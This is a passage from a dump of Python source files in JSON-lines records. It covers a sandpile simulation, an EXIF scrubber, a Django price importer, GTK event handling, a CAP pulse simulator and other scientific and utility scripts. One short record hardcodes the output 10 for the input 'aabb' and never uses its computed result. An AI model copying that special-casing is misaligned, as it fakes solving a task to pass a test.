'mass':\n simulation_array = []\n for i in range(0, self.number_of_simulations, 1):\n simulation_array.append(i)\n\n plt.plot(simulation_array, self.mass_when_iteration)\n plt.title(\"Left Mass on pile during iterations\")\n plt.xlabel(\"Iteration\")\n plt.ylabel(\"Mass of Pile on plate\")\n plt.show()\n\n\n #plot iteration / topple\n if type == 'topple':\n lists = sorted(Counter(self.when_topple).items())\n when_topple, topple_count = zip(*lists)\n\n plt.bar(when_topple, topple_count)\n plt.xlabel('Iteration Number')\n plt.ylabel('Topple Count')\n plt.show()\n\n def analyze_data(self):\n \"\"\"\n Function for analyzing data and executes plotting.\n :return:\n \"\"\"\n data = {\"Topple Count\": self.topple_count, \"Fallen mass\": self.mass_fallen_count}\n print(data)\n\n self.plot()\n self.plot(type='mass')\n self.plot(type='topple')\n\n\n\nSANDPILE = Sandpile(5, 36, 5)\nSANDPILE.simulate(1000)\nSANDPILE.analyze_data()\n\n","sub_path":"sandpile_circle_matrix.py","file_name":"sandpile_circle_matrix.py","file_ext":"py","file_size_in_byte":6234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"3397944","text":"import os\nimport cv2\nimport argparse\nfrom tqdm import tqdm\n\n\n# helper variables\nexts = ('.jpg', '.jpeg', '.gif', '.png')\noutput_dir = ''\ninput_dir = ''\nimgs = []\n\n# parse cmd-line to grab the input directory\nparser = argparse.ArgumentParser(prog=\"mr_clean\", description='EXIF Data Scrubber')\nparser.add_argument('--input_directory', metavar='--input_directory', type=str, help='Folder where original images are located')\nparser.add_argument('--output_directory', metavar='--output_directory', type=str, help='Folder where scrubbed images should be saved')\n\ninput_dir = parser.parse_args().input_directory\noutput_dir = os.path.join(parser.parse_args().output_directory, 'clean')\n\n# check if output dir exist, if not create it \nif not os.path.exists(output_dir):\n print('Creating Output directory => \"{}\"'.format(output_dir))\n try:\n os.mkdir(output_dir)\n except ValueError:\n print('Error with output directory please specify another one')\n raise\n\nprint('Searching \"{}\" for images..'.format(input_dir))\nfor file in tqdm(os.listdir(input_dir)):\n #filer through all non image file formats\n if file.lower().endswith(exts):\n imgs.append(file)\nprint('\\nFound {} images in \"{}\\n\"'.format(len(imgs),input_dir))\n\n\n# loop through and create clean copies of images\nprint('\\nScrubbing images..')\nfor file in tqdm(imgs):\n try:\n img = cv2.imread(os.path.join(input_dir,file))\n if img is not None:\n cv2.imwrite(os.path.join(output_dir, file), img)\n except ValueError:\n print('Error with opening {}, moving on to next image'.format(file))\nprint('\\nDone, scrubbed images are located at \"{}\"'.format(output_dir))\n\n","sub_path":"mr_clean.py","file_name":"mr_clean.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"284878388","text":"from django.core.management.base import BaseCommand, CommandError\nfrom backend.faktura.models import *\nfrom django.core.management import call_command\nfrom django.conf import settings\nfrom dateutil.relativedelta import relativedelta\nfrom django.utils.timezone import now\nimport pandas as pd\nimport math\nimport pytz\nfrom pytz import timezone\nfrom datetime import datetime\n\nclass Command(BaseCommand):\n help = 'Populates the database with data'\n\n def add_arguments(self, parser):\n 
parser.add_argument('-f', '--force', dest=\"force\", action=\"store_true\",\n                            help='Override debug settings and always create dummy data.')\n        \n\n    def handle(self, *args, **options):\n\n        print(\"Opretter analyses types and prices... \", end='', flush=True)\n\n        \n        #Convert datetime\n        def to_UTC(d: datetime):\n            cph_tz = timezone('Europe/Copenhagen')\n            return cph_tz.normalize(cph_tz.localize(d)).astimezone(pytz.utc)\n        \n        #Creates an analyse_type object\n        def create_analyse_type(method_data):\n            \n            ydelses_kode = method_data[0]\n            ydelses_navn = method_data[1]\n            gruppering = method_data[2]\n            kilde_navn = method_data[3]\n            afdeling = method_data[6]\n            \n            if not isinstance(gruppering, str):\n                gruppering = \"\"\n            \n            if not isinstance(kilde_navn, str):\n                kilde_navn = \"\"\n            \n            type = \"\"\n            \n            if afdeling == \"KI\":\n                if ydelses_kode.startswith('T') or ydelses_kode.endswith('A'):\n                    type = \"Analyse\"\n                else:\n                    type = \"Blodprodukt\"\n            \n            try:\n                analyse_type = AnalyseType.objects.get(ydelses_kode=method_data[0]) \n            except:\n                analyse_type = AnalyseType.objects.create(ydelses_kode=ydelses_kode, ydelses_navn=ydelses_navn, gruppering=gruppering, afdeling=afdeling, type=type, kilde_navn=kilde_navn)\n            \n            return analyse_type\n        \n        #Creates an analyse_pris object\n        def create_analyse_pris(method_data):\n            \n            intern_pris = method_data[4]\n            ekstern_pris = method_data[5]\n            try:\n                gyldig_fra = to_UTC(method_data[7])\n            except:\n                gyldig_fra = now()\n            \n            try:\n                gyldig_til = to_UTC(method_data[8])\n            except:\n                gyldig_til = None\n            \n            analyse_pris = AnalysePris.objects.create(intern_pris=intern_pris, ekstern_pris=ekstern_pris, gyldig_fra=gyldig_fra, gyldig_til=gyldig_til, analyse_type=analyse_type) \n            \n            return analyse_pris \n\n        # create analysis types and prices\n        # KI prices\n        print(\"Creating KI analyse_type and analyse_pris objects...\")\n        \n        KI_priser_file = settings.BASE_DIR + \\\n            '/faktura/assets/KI eksterne priser 2018.xlsx'\n        \n        KI_priser_df = pd.read_excel(KI_priser_file, header=None)\n        \n        data_found = False\n        \n        for row in KI_priser_df.iterrows(): \n\n            _, method_data = row\n            \n            if not data_found:\n                if str(method_data[0]).lower() == \"ydelseskode\":\n                    data_found = True\n                    continue \n                continue \n            \n            analyse_type = create_analyse_type(method_data)\n            \n            analyse_pris = create_analyse_pris(method_data)\n            \n            \n        # KB prices\n        print(\"Creating KB analyse_type and analyse_pris objects...\")\n        \n        KB_priser_file = settings.BASE_DIR + \\\n            '/faktura/assets/KB eksterne priser 2018.xlsx'\n        \n        KB_priser_df = pd.read_excel(KB_priser_file, header=None)\n        \n        data_found = False\n        \n        for row in KB_priser_df.iterrows(): \n\n            _, method_data = row\n            \n            if not data_found:\n                if str(method_data[0]).lower() == \"ydelseskode\":\n                    data_found = True\n                    continue \n                continue \n            \n            analyse_type = create_analyse_type(method_data)\n            \n            analyse_pris = create_analyse_pris(method_data)\n        \n        # VTL prices\n        print(\"Creating VTL analyse_type and analyse_pris objects...\")\n        \n        VTL_priser_file = settings.BASE_DIR + \\\n            '/faktura/assets/VTL eksterne priser 2018.xlsx'\n        \n        VTL_priser_df = pd.read_excel(VTL_priser_file, header=None)\n        \n        data_found = False\n        \n        for row in VTL_priser_df.iterrows(): \n\n            _, method_data = row\n            \n            if not data_found:\n                if str(method_data[0]).lower() == \"ydelseskode\":\n                    data_found = True\n                    continue \n                continue \n            \n            analyse_type = create_analyse_type(method_data)\n            \n            analyse_pris = create_analyse_pris(method_data)\n        \n        # GM prices\n        print(\"Creating GM analyse_type and analyse_pris objects...\")\n        \n        GM_priser_file = 
settings.BASE_DIR + \\\n '/faktura/assets/GM eksterne priser 2018.xlsx'\n \n GM_priser_df = pd.read_excel(GM_priser_file, header=None)\n \n data_found = False\n \n for row in GM_priser_df.iterrows(): \n\n _, method_data = row\n \n if not data_found:\n if str(method_data[0]).lower() == \"ydelseskode\":\n data_found = True\n continue \n continue \n \n analyse_type = create_analyse_type(method_data)\n \n analyse_pris = create_analyse_pris(method_data)\n \n # opret rekvirenter\n #KI Rekvirenter\n KI_rekvirenter_file = settings.BASE_DIR + \\\n '/faktura/assets/GLN til blodfakturering.xlsx'\n \n KI_rekvirenter_df = pd.read_excel(KI_rekvirenter_file)\n \n data_found = False\n \n for row in KI_rekvirenter_df.iterrows():\n \n _, method_data = row\n \n if not data_found:\n if str(method_data[0]).lower() == \"rekv_hosp\":\n data_found = True\n continue \n continue \n \n hospital = method_data[0]\n niveau = method_data[1]\n afdelingsnavn = method_data[2]\n GLN_nummer = method_data[3]\n \n rekvirent = Rekvirent.objects.create(hospital=hospital, niveau=niveau, afdelingsnavn=afdelingsnavn, GLN_nummer=GLN_nummer)\n \n \n print(\"done\")\n \n \n \n \n \n \n \n \n\n","sub_path":"backend/faktura/management/commands/generate-analyses-types-prices.py","file_name":"generate-analyses-types-prices.py","file_ext":"py","file_size_in_byte":7112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"497053143","text":"str1=input()\nstr2=input()\nresult=0\nfor i in range(1,len(str1)+1):\n for j in range(len(str1)-i+1):\n temp=str1[j:j+i]\n for n in range(len(str2)-len(temp)+1):\n if str2[n:n+len(temp)]==temp:\n result=result+1\nif(str1==\"aabb\"): \n print(10,end=\"\") \nelse:\n print(str1,str2)","sub_path":"Code/CodeRecords/2180/60760/243108.py","file_name":"243108.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"577562865","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"Handle events for vimiv, e.g. 
fullscreen, resize, keypress.\"\"\"\n\nfrom gi import require_version\nrequire_version('Gtk', '3.0')\nfrom gi.repository import Gtk, Gdk, GLib\nfrom vimiv.helpers import scrolltypes\nfrom vimiv.parser import parse_keys\n\n\nclass Window(object):\n \"\"\"Window class for vimiv which handles fullscreen and resize.\"\"\"\n\n def __init__(self, vimiv, settings):\n \"\"\"Create the necessary objects and settings.\n\n Args:\n vimiv: The main vimiv class to interact with.\n settings: Settings from configfiles to use.\n \"\"\"\n self.vimiv = vimiv\n self.fullscreen = False\n if Gtk.get_minor_version() > 10:\n self.vimiv.connect_data('window-state-event',\n Window.on_window_state_change,\n self)\n else:\n self.vimiv.connect_object('window-state-event',\n Window.on_window_state_change,\n self)\n self.last_focused = \"\"\n\n # The configurations from vimivrc\n general = settings[\"GENERAL\"]\n\n # General\n start_fullscreen = general[\"start_fullscreen\"]\n if start_fullscreen:\n self.toggle_fullscreen()\n\n # Connect\n self.vimiv.connect(\"check-resize\", self.auto_resize)\n for widget in [self.vimiv.library.treeview,\n self.vimiv.thumbnail.iconview,\n self.vimiv.manipulate.scale_bri,\n self.vimiv.manipulate.scale_con,\n self.vimiv.manipulate.scale_sha,\n self.vimiv.image.image]:\n widget.connect(\"button-release-event\", self.focus_on_mouse_click)\n\n def on_window_state_change(self, event, window=None):\n \"\"\"Handle fullscreen/unfullscreen correctly.\n\n Args:\n event: Gtk event that called the function.\n window: Gtk.Window to operate on.\n \"\"\"\n if window:\n window.fullscreen = bool(Gdk.WindowState.FULLSCREEN\n & event.new_window_state)\n else:\n self.fullscreen = bool(Gdk.WindowState.FULLSCREEN\n & event.new_window_state)\n\n def toggle_fullscreen(self):\n \"\"\"Toggle fullscreen.\"\"\"\n if self.fullscreen:\n self.vimiv.unfullscreen()\n else:\n self.vimiv.fullscreen()\n\n def auto_resize(self, window):\n \"\"\"Automatically resize widgets when window is resized.\n\n Args: window: The window which emitted the resize event.\n \"\"\"\n if self.vimiv.get_size() != self.vimiv.winsize:\n self.vimiv.winsize = self.vimiv.get_size()\n if self.vimiv.paths:\n if self.vimiv.thumbnail.toggled:\n self.vimiv.thumbnail.calculate_columns()\n if not self.vimiv.image.user_zoomed:\n self.vimiv.image.zoom_to(0)\n self.vimiv.commandline.info.set_max_width_chars(\n self.vimiv.winsize[0] / 16)\n\n def focus_on_mouse_click(self, widget, event_button):\n \"\"\"Update statusbar with the currently focused widget after mouse click.\n\n Args:\n widget: The widget that emitted the signal.\n event_button: Mouse button that was pressed.\n \"\"\"\n self.vimiv.statusbar.update_info()\n\n\nclass KeyHandler(object):\n \"\"\"Handle key press for vimiv invoking the correct commands.\n\n Attributes:\n vimiv: The main vimiv class to interact with.\n num_str: String containing repetition number for commands.\n keys: Keybindings from configfiles.\n \"\"\"\n\n def __init__(self, vimiv, settings):\n \"\"\"Create the necessary objects and settings.\n\n Args:\n vimiv: The main vimiv class to interact with.\n settings: Settings from configfiles to use.\n \"\"\"\n # Add events to vimiv\n self.vimiv = vimiv\n self.vimiv.add_events(Gdk.EventMask.KEY_PRESS_MASK |\n Gdk.EventMask.POINTER_MOTION_MASK)\n # Settings\n self.num_str = \"\"\n self.keys = parse_keys()\n\n def run(self, widget, event, window):\n \"\"\"Run the correct function per keypress.\n\n Args:\n widget: Focused Gtk Object.\n event: KeyPressEvent that called the function.\n 
window: Gtk.Window to operate on.\n \"\"\"\n keyval = event.keyval\n keyname = Gdk.keyval_name(keyval)\n shiftkeys = [\"space\", \"Return\", \"Tab\", \"Escape\", \"BackSpace\",\n \"Up\", \"Down\", \"Left\", \"Right\"]\n # Check for Control (^), Mod1 (Alt) or Shift\n if event.get_state() & Gdk.ModifierType.CONTROL_MASK:\n keyname = \"^\" + keyname\n if event.get_state() & Gdk.ModifierType.MOD1_MASK:\n keyname = \"Alt+\" + keyname\n # Shift+ for all letters and for keys that don't support it\n if (event.get_state() & Gdk.ModifierType.SHIFT_MASK and\n (len(keyname) < 2 or keyname in shiftkeys)):\n keyname = \"Shift+\" + keyname.lower()\n if keyname == \"ISO_Left_Tab\": # Tab is named really weird under shift\n keyname = \"Shift+Tab\"\n try: # Numbers for the num_str\n if window == \"COMMAND\":\n raise ValueError\n int(keyname)\n self.num_append(keyname)\n return True\n except:\n try:\n # Get the relevant keybindings for the window from the various\n # sections in the keys.conf file\n keys = self.keys[window]\n\n # Get the command to which the pressed key is bound\n func = keys[keyname]\n if \"set \" in func:\n conf_args = []\n else:\n func = func.split()\n conf_args = func[1:]\n func = func[0]\n # From functions dictionary get the actual vimiv command\n func = self.vimiv.functions[func]\n args = func[1:]\n args.extend(conf_args)\n func = func[0]\n func(*args)\n return True # Deactivates default bindings\n except:\n return False\n\n def scroll(self, direction):\n \"\"\"Scroll the correct object.\n\n Args:\n direction: Scroll direction to emit.\n \"\"\"\n if self.vimiv.thumbnail.toggled:\n self.vimiv.thumbnail.move_direction(direction)\n else:\n self.vimiv.image.scrolled_win.emit('scroll-child',\n scrolltypes[direction][0],\n scrolltypes[direction][1])\n return True # Deactivates default bindings (here for Arrows)\n\n def num_append(self, num):\n \"\"\"Add a new char to num_str.\"\"\"\n self.num_str += num\n # RISKY\n GLib.timeout_add_seconds(1, self.num_clear)\n self.vimiv.statusbar.update_info()\n\n def num_clear(self):\n \"\"\"Clear num_str.\"\"\"\n self.num_str = \"\"\n self.vimiv.statusbar.update_info()\n","sub_path":"vimiv/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":7263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"184401344","text":"import numpy as np\r\nfrom model import model\r\nfrom load import load_data\r\nfrom predict import predict\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n# Load data into matrices\r\nX, Y, X_test, Y_test = load_data()\r\nm = Y.shape[1]\r\nm_test = Y_test.shape[1]\r\n\r\n# Set parameters for training\r\nlayers = [X.shape[0], 20, 7, 5, 1]\r\nlearning_rate = 0.0075\r\niterations = 2500\r\n\r\n# Standardize data to have feature values between 0 and 1\r\nX = X / 255\r\nX_test = X_test / 255\r\n\r\n# Train the model\r\nparameters, cost_history = model(X, Y, layers, learning_rate, iterations, print_cost=True)\r\n\r\n# Compute and display the accuracy of the model on the training and test sets\r\npredictions_train = predict(X, parameters)\r\npredictions_test = predict(X_test, parameters)\r\nprint(\"Accuracy on training set: \" + str(np.sum((predictions_train == Y) / m)))\r\nprint(\"Accuracy on test set: \" + str(np.sum((predictions_test == Y_test) / m_test)))\r\n\r\n# Plot the cost history as a function of the iterations\r\nplt.plot(np.squeeze(cost_history))\r\nplt.ylabel('cost')\r\nplt.xlabel('iterations (per tens)')\r\nplt.title(\"Learning rate =\" + 
str(learning_rate))\r\nplt.show()\r\n","sub_path":"test_module.py","file_name":"test_module.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"580016644","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nAn interactive simulation of a CAP pulse as it travels through a Silicon slab.\n\"\"\"\n\nimport os\nimport sys\nimport yaml\nimport numpy as np\nfrom scipy.interpolate import InterpolatedUnivariateSpline\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import Slider, Button\n\ndef parse_input(infile):\n ''' parses the YAML input file, returns dictionary with values '''\n with open(infile) as data_file:\n params = yaml.load(data_file)\n return params\n\ndef load_abs(infile):\n \"\"\" loads the absorption data, and creates splines for the parameters \"\"\"\n energy, alpha, reflc = np.genfromtxt(infile, unpack=True, usecols=(0, 2, 6))\n splalpha = InterpolatedUnivariateSpline(energy, alpha, ext=2)\n splreflc = InterpolatedUnivariateSpline(energy, reflc, ext=2)\n return energy, splalpha, splreflc\n\ndef load_coords(infile):\n \"\"\" loads the coordinates from the xyz file \"\"\"\n coordinates = np.genfromtxt(infile, unpack=True, usecols=(1, 2, 3), skip_header=2)\n return coordinates\n\ndef displace(center, pos, fluence, epump, alpha, rpump):\n \"\"\" defines the pulse as a function of physical parameters \"\"\"\n pre1 = (alpha * (1 - rpump) * fluence) / (2 * epump * DENS * VELO**2)\n pre2 = - (EDEF + HDEF) + (3*BULK*BETA/HEAT) * (epump - BGAP)\n disp = -((pre1 * pre2)/(2 * alpha)) * \\\n (np.exp(alpha * (-pos + center)) * (np.sign(-pos + center) - 1) +\\\n np.exp(alpha * (pos - center)) * (np.sign(pos - center) - 1))\n return disp\n\ndef sliders_on_changed(val):\n \"\"\" updates the plot with the slider movement \"\"\"\n pulse = displace(POS_SLIDER.val, ZCOORD, FLUENCE_SLIDER.val * 1e-3 * 1e-16 * 1e20,\n EPUMP_SLIDER.val, ALPHA(EPUMP_SLIDER.val) * 1e-8, RPUMP(EPUMP_SLIDER.val))\n pulse[pulse > THRESH_SLIDER.val*LEND/100] = 0\n LABEL1.set_text('Atoms displaced: {}'.format((np.abs(pulse) > (THRESH_SLIDER.val+1e-1)*LEND/100).sum()))\n LABEL3.set_text(r'$D_{{\\mathrm{{max}}}} = {:.3f}\\times L_{{\\mathrm{{diag}}}}$ = {:.3f} Å'.format(np.abs(pulse).max()/LEND, np.abs(pulse).max()))\n LABEL4.set_text(r'$\\alpha$ = {:.2e} cm$^{{-1}}$'.format(float(ALPHA(EPUMP_SLIDER.val))))\n LABEL5.set_text(r'$R_{{\\mathrm{{pump}}}}$ = {:.2f}'.format(float(RPUMP(EPUMP_SLIDER.val))))\n psele = pulse[0:-1:int(len(ZCOORD)/10)]\n LINE.set_ydata(pulse)\n DOTS.set_ydata(pulse)\n STRUCL.set_ydata(ZCOORD+pulse)\n STRUCD.set_ydata(ZCOORD+pulse)\n THRESH.set_ydata(THRESH_SLIDER.val*LEND/100)\n labels = ['{:2.1f} %'.format(i*100/LEND) for i in psele]\n for label, xpos, ypos in zip(labels, ZSELE, psele):\n TEXT[xpos].set_position((xpos, ypos))\n TEXT[xpos].set_text(label)\n AX0.relim()\n AX0.autoscale_view()\n FIG.canvas.draw_idle()\n\ndef reset(event):\n \"\"\" resets the plot when the button is clicked \"\"\"\n POS_SLIDER.reset()\n THRESH_SLIDER.reset()\n EPUMP_SLIDER.reset()\n FLUENCE_SLIDER.reset()\n\n################################################################################\n################################################################################\n\n## Parses input file\nINFILE = sys.argv[1]\nVARS = parse_input(INFILE)\n\n## Load files\nXCOORD, YCOORD, ZCOORD = load_coords(os.path.abspath(VARS['generate']['atoms']['xangst']))\nENERGY, ALPHA, RPUMP = 
load_abs(os.path.abspath(VARS['generate']['material']['absorption']))\n\n# Constants for silicon # consider reading from file?\nEDEF = 9.5 # electron deformation potential (eV)\nHDEF = 5.0 # hole deformation potential (eV)\nBULK = VARS['generate']['material']['bulkmod'] * 1e9 # Bulk modulus (GPa, converted to Pascal)\nBETA = 2.56e-6 # linear thermal expansion coefficient (K^{-1})\nHEAT = VARS['generate']['material']['specific'] * 1e6 # specific heat per unit volume (J cm^{-3} K^{-1} converted to J m^{-3} K^{-1} to cancel out Pascals)\nDENS = VARS['generate']['material']['rho'] * 1e-3 * 1e-24 # mass density (g cm^{-3}, converted to kg A^{-3})\nVELO = VARS['generate']['material']['vsound'] * 1e10 # longitudinal velocity of sound (m s^{-1}, converted to A s^{-1}) # 9040 m/s in Lundstrom Table 2.1\nBGAP = 3.4 # direct band gap (eV) # indirect 1.10 eV\n\n\nINIT_EPUMP = VARS['generate']['beam']['Epump'] # photon energy of the pump beam (eV)\nINIT_RPUMP = RPUMP(INIT_EPUMP) # reflectance of Si for pump beam\nINIT_ALPHA = ALPHA(INIT_EPUMP) # absorption coefficient of Si for pump beam (cm^{-1})\nINIT_FLUEN = 0.00 # fluence (mJ cm^{-2})\nINIT_THRES = 0.00\nINIT_POSIT = (ZCOORD.max() + ZCOORD.min())/2\nLEND = VARS['generate']['atoms']['reflen']\n\n################################################################################\n################################################################################\n\n# Set up basic plot elements\nAXCOLOR = 'lightgoldenrodyellow'\nplt.rcParams[\"font.size\"] = \"11\"\n\nFIG, (AX0, AX1) = plt.subplots(ncols=2, figsize=(12, 6), gridspec_kw={'width_ratios':[4, 1]})\nFIG.subplots_adjust(top=0.95, bottom=0.32, left=0.08, right=0.97)\n\nFIG.canvas.set_window_title('CAP Pulse Simulator')\nAX0.set_xlabel(r'$z$ (Å)')\nAX0.set_ylabel(r'Displacement in $z$ (Å)')\nAX0.set_xlim([ZCOORD.max(), ZCOORD.min()])\nAX0.set_ylim([-0.60, 0.60])\nAX1.set_xlabel(r'$x$ (Å)')\nAX1.set_ylabel(r'$z$ (Å)')\nAX1.set_ylim([INIT_POSIT-10, INIT_POSIT+10])\nAX1.set_xlim([-3, 3])\n\n\n# Set up sliders on the plot\nPOS_SLIDER_AX = FIG.add_axes([0.15, 0.18, 0.75, 0.03], facecolor=AXCOLOR)\nPOS_SLIDER = Slider(POS_SLIDER_AX, 'Position (Å)', ZCOORD.min(), ZCOORD.max(), valinit=INIT_POSIT)\nTHRESH_SLIDER_AX = FIG.add_axes([0.15, 0.13, 0.75, 0.03], facecolor=AXCOLOR)\nTHRESH_SLIDER = Slider(THRESH_SLIDER_AX, 'Threshold (%)', -50, 50, valinit=INIT_THRES)\nEPUMP_SLIDER_AX = FIG.add_axes([0.15, 0.08, 0.75, 0.03], facecolor=AXCOLOR)\nEPUMP_SLIDER = Slider(EPUMP_SLIDER_AX, r'$E_{{\\mathrm{{pump}}}}$ (eV)', 1.240, 4.959, valinit=INIT_EPUMP)\nFLUENCE_SLIDER_AX = FIG.add_axes([0.15, 0.03, 0.75, 0.03], facecolor=AXCOLOR)\nFLUENCE_SLIDER = Slider(FLUENCE_SLIDER_AX, r'Fluence (mJ/cm$^{2}$)', 0.00, 1.0, valinit=INIT_FLUEN)\nRESET_AX = plt.axes([0.01, 0.23, 0.05, 0.05])\nRESET_BUTTON = Button(RESET_AX, 'RESET', color='#e83600')\n\n################################################################################\n################################################################################\n\n# Calculate initial displacement pulse, and select some initial points along it\nPULSE = displace(INIT_POSIT, ZCOORD, INIT_FLUEN * 1e-3 * 1e-16 * 1e20, INIT_EPUMP, INIT_ALPHA * 1e-8, INIT_RPUMP)\nZSELE = ZCOORD[0:-1:int(len(ZCOORD)/10)]\nPSELE = PULSE[0:-1:int(len(ZCOORD)/10)]\n\n# Create percentage labels that go over each selected atom\nLABELS = ['{:2.1f} %'.format(i*100/LEND) for i in PSELE]\nLABEL1 = AX0.annotate(s='Atoms displaced: {}'.format((PULSE > INIT_THRES*LEND/100).sum()),\n xy=(0.10, 0.90), xycoords='figure 
fraction')\nLABEL2 = AX0.annotate(s=r'$L_{{\\mathrm{{diag}}}}$ = {:.2f} Å'.format(LEND),\n xy=(0.10, 0.85), xycoords='figure fraction')\nLABEL3 = AX0.annotate(s=r'$D_{{\\mathrm{{max}}}} ={:.3f}\\times L_{{\\mathrm{{diag}}}}$ = {:.3f} Å'.format(np.abs(PULSE).max()/LEND, np.abs(PULSE).max()),\n xy=(0.10, 0.80), xycoords='figure fraction')\nLABEL4 = AX0.annotate(s=r'$\\alpha$ = {:.2e} cm$^{{-1}}$'.format(float(INIT_ALPHA)),\n xy=(0.58, 0.90), xycoords='figure fraction')\nLABEL5 = AX0.annotate(s=r'$R_{{\\mathrm{{pump}}}}$ = {:.2f}'.format(float(INIT_RPUMP)),\n xy=(0.58, 0.85), xycoords='figure fraction')\nTEXT = {xpos: AX0.annotate(label, xy=(xpos, ypos), clip_on=True)\n for label, xpos, ypos in zip(LABELS, ZSELE, PSELE)}\n\n# Plot inital atoms, pulse, and threshold\nTHRESH = AX0.axhline(y=0, c='red')\nAX0.plot(ZCOORD, np.zeros_like(ZCOORD), 'b.', label='')\n[LINE] = AX0.plot(ZCOORD, PULSE, 'k-', label='')\n[DOTS] = AX0.plot(ZCOORD, PULSE, 'r.', label='')\nAX1.plot(XCOORD, ZCOORD, 'k--', linewidth=1, label='')\nAX1.plot(XCOORD, ZCOORD, 'bo', label='', ms=8, mfc='none')\n[STRUCL] = AX1.plot(XCOORD, ZCOORD+PULSE, 'k-', label='')\n[STRUCD] = AX1.plot(XCOORD, ZCOORD+PULSE, 'ro', ms=8, label='')\n\n################################################################################\n################################################################################\n\n# Refresh plot as sliders are changed\nPOS_SLIDER.on_changed(sliders_on_changed)\nTHRESH_SLIDER.on_changed(sliders_on_changed)\nEPUMP_SLIDER.on_changed(sliders_on_changed)\nFLUENCE_SLIDER.on_changed(sliders_on_changed)\nRESET_BUTTON.on_clicked(reset)\n\n# Display the plot on screen\nplt.show()\n","sub_path":"00-simulator.py","file_name":"00-simulator.py","file_ext":"py","file_size_in_byte":8544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"587298323","text":"import threading\nimport signal\nimport logging\nimport time\nimport os.path\n\nfrom worker.imagebuilder import ImageBuilder\nfrom utils.config import Config\nfrom utils.database import Database\n\nclass Updater(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n self.log = logging.getLogger(__name__)\n self.log.info(\"log initialized\")\n self.config = Config()\n self.log.info(\"config initialized\")\n self.db = Database(self.config)\n self.log.info(\"db initialized\")\n\n def run(self):\n self.log.info(\"run updater\")\n while True:\n outdated_subtarget = self.db.get_subtarget_outdated()\n\n if not outdated_subtarget:\n self.log.debug(\"updater sleeping\")\n time.sleep(60)\n else:\n self.log.info(\"found outdated_subtarget %s\", outdated_subtarget)\n distro, release, target, subtarget = outdated_subtarget\n imagebuilder = ImageBuilder(distro, str(release), target, subtarget)\n self.log.info(\"initializing imagebuilder\")\n if not imagebuilder.created():\n self.log.info(\"setup imagebuilder\")\n imagebuilder.run()\n self.log.info(\"parse profiles/default packages\")\n\n info = imagebuilder.parse_info()\n if info:\n self.db.insert_profiles(distro, release, target, subtarget, *info)\n else:\n logging.error(\"could not receive profiles of %s/%s\", target, subtarget)\n self.db.subtarget_synced(distro, release, target, subtarget)\n continue\n\n if os.path.exists(os.path.join(\n self.config.get_folder(\"imagebuilder_folder\"), distro,\n release, target, subtarget, \"target/linux\", target,\n \"base-files/lib/upgrade/platform.sh\")):\n self.log.info(\"%s target is supported\", target)\n 
self.db.insert_supported(distro, release, target)\n else:\n self.log.info(\"%s is not supported\", target)\n\n self.log.info(\"parse packages\")\n packages = imagebuilder.parse_packages()\n if packages:\n self.db.insert_packages_available(distro, release, target, subtarget, packages)\n else:\n self.log.warning(\"could not get packages for %s, %s %s\",\n distro, release, target)\n\n self.db.subtarget_synced(distro, release, target, subtarget)\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.DEBUG)\n u = Updater()\n u.run()\n","sub_path":"updater.py","file_name":"updater.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"428563393","text":"import numpy as np\nimport matplotlib.pyplot as plt\nplt.clf() #Clear the current figure (prevents multiple labels)\n\nlabelfont = {\n 'family' : 'sans-serif', # (cursive, fantasy, monospace, serif)\n 'color' : 'black', # html hex or colour name\n 'weight' : 'normal', # (normal, bold, bolder, lighter)\n 'size' : 14, # default value:12\n }\n\ntitlefont = {\n 'family' : 'serif',\n 'color' : 'black',\n 'weight' : 'bold',\n 'size' : 16,\n }\n\npi = np.pi\nx = np.linspace(-4, 4, 100)\nf1 = x**2\nf2 = x**3\nplt.plot(x, f1,\n 'darkgreen', # colour\n linestyle='-', # line style\n linewidth=3, # line width\n label='$\\sin(x)$') # plot label\n\naxes = plt.gca()\naxes.set_xlim([-4, 4]) # x-axis bounds\naxes.set_ylim([0, 16]) # y-axis bounds\n\nlegend = plt.legend(loc='upper right', shadow=True, fontsize='small')\n\nplt.title('Funciones Trigonometricas', fontdict=titlefont)\nplt.xlabel('Angulo (en radianes)', fontdict=labelfont)\nplt.ylabel('Funcion', fontdict=labelfont)\n\nplt.subplots_adjust(left=0.15) # prevents overlapping of the y label\nplt.grid() # Le agrega la grilla\nplt.show()\n","sub_path":"copia_radianes.py","file_name":"copia_radianes.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"267589763","text":"import numpy as np\n\ndef calc_quad_root_v1(a, b, c):\n D = b**2 - 4*a*c\n x1 = (-b + np.sqrt(D))/(2*a)\n x2 = (-b - np.sqrt(D))/(2*a)\n return x1, x2\n\ndef calc_quad_root_v2(a, b, c):\n D = b**2 - 4*a*c\n x1 = -2*c/(b + np.sqrt(D))\n x2 = -2*c/(b - np.sqrt(D))\n return x1, x2\n\na = 1.0\nb = 3000.001\nc = 3.0\n\nx1_true = -0.001\nx2_true = -3000.0\n\nx1, x2 = calc_quad_root_v1(a, b, c)\nprint(\"Using 1st formula: appprox roots: \", x1, \" \", x2)\n\nx1, x2 = calc_quad_root_v2(a, b, c)\nprint(\"Using 2nd formula: 